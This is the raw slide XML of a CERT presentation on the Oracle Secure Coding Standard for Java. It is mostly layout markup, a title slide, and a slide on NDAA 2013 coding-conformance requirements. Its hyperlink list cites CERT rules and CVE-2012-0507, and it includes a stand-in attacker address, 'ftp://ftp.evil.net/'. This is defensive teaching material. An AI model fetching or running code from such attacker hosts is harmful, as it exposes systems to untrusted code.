            <a:pPr marL="274320" marR="0" lvl="0" indent="-274320" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to insert text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1471745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Header only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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457162" y="274363"/>
            <a:ext cx="8229689" cy="1143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81614" tIns="40807" rIns="81614" bIns="40807" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click To Edit Master Title Style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="531348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タイトルとコンテンツ">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bwMode="auto">
          <a:xfrm>
            <a:off x="420565" y="312821"/>
            <a:ext cx="8294400" cy="505326"/>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defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>マスター タイトルの書式設定</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="422031" y="980728"/>
            <a:ext cx="8292934" cy="547260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a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="70339" y="6588076"/>
            <a:ext cx="314119" cy="238311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="36000" tIns="36000" rIns="36000" bIns="36000" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000" u="none">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E8EA26E3-FDC6-4C5B-9844-A44D4941DF87}" type="slidenum">
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26586758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143000"/>
            <a:ext cx="41529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143000"/>
            <a:ext cx="41529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1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Rectangle 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6488113"/>
            <a:ext cx="9144000" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="92309" tIns="46154" rIns="92309" bIns="46154" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8458200" cy="51054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1034" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="260350" y="228600"/>
            <a:ext cx="8474075" cy="71437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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Rectangle 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8558213" y="6581775"/>
            <a:ext cx="323850" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{0703CB3C-195E-4CE1-99CE-72ECE89D55E3}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="1"/>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="900" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Line 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="977900"/>
            <a:ext cx="8458200" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1116" name="Picture 92"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18" cstate="print"/>
          <a:srcRect t="4584" r="1852"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="6494463"/>
            <a:ext cx="4038600" cy="363537"/>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860" r:id="rId1"/>
    <p:sldLayoutId id="2147483861" r:id="rId2"/>
    <p:sldLayoutId id="2147483862" r:id="rId3"/>
    <p:sldLayoutId id="2147483863" r:id="rId4"/>
    <p:sldLayoutId id="2147483864" r:id="rId5"/>
    <p:sldLayoutId id="2147483865" r:id="rId6"/>
    <p:sldLayoutId id="2147483866" r:id="rId7"/>
    <p:sldLayoutId id="2147483867" r:id="rId8"/>
    <p:sldLayoutId id="2147483868" r:id="rId9"/>
    <p:sldLayoutId id="2147483869" r:id="rId10"/>
    <p:sldLayoutId id="2147483870" r:id="rId11"/>
    <p:sldLayoutId id="2147483871" r:id="rId12"/>
    <p:sldLayoutId id="2147483872" r:id="rId13"/>
    <p:sldLayoutId id="2147483873" r:id="rId14"/>
    <p:sldLayoutId id="2147483874" r:id="rId15"/>
    <p:sldLayoutId id="2147483875" r:id="rId16"/>
  </p:sldLayoutIdLst>
  <p:transition/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="25000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="25000"/>
        </a:spcAft>
        <a:buSzPct val="90000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="—"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buChar char="o"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:srgbClr val="727272"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:srgbClr val="727272"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:srgbClr val="727272"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:srgbClr val="727272"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:srgbClr val="727272"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="50000"/>
        </a:spcAft>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Times" pitchFamily="18" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2100">
          <a:solidFill>
            <a:srgbClr val="72727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playlist?list=PLSNlEg26NNpxMofZSX-72rxjFEUk9myk-" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.org/secure-coding/products-services/scale.cf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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507"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permission@sei.cmu.edu"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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/java/OBJ06-J.+Defensively+copy+mutable+inputs+and+mutable+internal+components" TargetMode="External"/><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16.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.pn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www.securecoding.cert.org/confluence/display/java/IDS07-J.+Do+not+pass+untrusted,+unsanitized+data+to+the+Runtime.exec()+method"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ftp://ftp.evil.net/"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s://www.securecoding.cert.org/confluence/display/jg/Java+Coding+Guidelines" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:secure-coding@cert.org"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securecoding.cert.org/"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hyperlink" Target="http://www.cert.org/secure-coding" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:rcs@cert.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.emf"/></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24" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4181475" y="5726113"/>
            <a:ext cx="184150" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38961" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>the CERT Oracle Secure Coding Standard for Java [CON2368] </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38962" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3364974"/>
            <a:ext cx="5486400" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Robert C. Seacord</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure Coding Technical Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>David Svoboda </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engineer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2367968986"/>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Government Demand</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>933 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>National </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense Authorization Act for Fiscal Year </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>evidence that government software development and maintenance organizations and contractors are conforming in computer software coding </a:t>
